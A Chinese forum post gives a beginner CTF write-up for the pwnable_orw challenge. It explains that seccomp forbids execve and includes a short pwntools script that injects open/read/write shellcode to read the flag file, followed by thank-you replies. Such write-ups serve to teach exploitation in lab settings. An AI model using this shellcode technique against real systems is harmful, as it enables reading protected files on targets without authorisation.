CTF-Pwn入门刷题WP

呆毛王与咖喱棒 · 发表于 2020-12-20 19:04

主要在BUUOJ上面刷Pwn题，今年的目标是刷完所有的一分题；
每周会写两三道题目的WP；

pwnable_orw

checksec发现是32位

checksec

使用IDA打开看一下，主要功能是直接输入shellcode，然后执行

main函数逆向

这个题目前面有一个orw_seccomp函数，这个函数内部调用了seccomp

这是一个之前没听过的概念，会进入linux的一个高安全模式，这种模式下不能执行execve这样的系统调用；

只能执行read、write、open这些

所以这边写脚本需要用shellcraft自己写shellcode，不能直接用sh这样

from pwn import *

io = process('./orw')
elf = ELF('./orw')

payload = asm(shellcraft.open('flag'))
payload += asm(shellcraft.read(3,'esp',100))
payload += asm(shellcraft.write(1,'esp',100))

io.sendline(payload)
io.interactive()

cjc3528 · 发表于 2020-12-21 12:41

谢谢分享好东西啊

zouludaifeng · 发表于 2020-12-21 13:23

感谢大神分享

lsy832 · 发表于 2020-12-21 13:23

谢谢分享好东西啊

shelly1314 · 发表于 2020-12-21 14:50

感谢楼主分享

judgecx · 发表于 2020-12-21 16:03

感谢分享

hfw · 发表于 2020-12-21 16:51

感谢分享

蚂蚁打老虎 · 发表于 2020-12-22 08:54

感谢大神分享

hackcat · 发表于 2020-12-22 09:36

请问PWN入门看啥好？

crisislal · 发表于 2020-12-22 09:37

6666真不错

帐号		自动登录	找回密码
密码			注册[Register]

[CTF] CTF-Pwn入门刷题WP

pwnable_orw

免费评分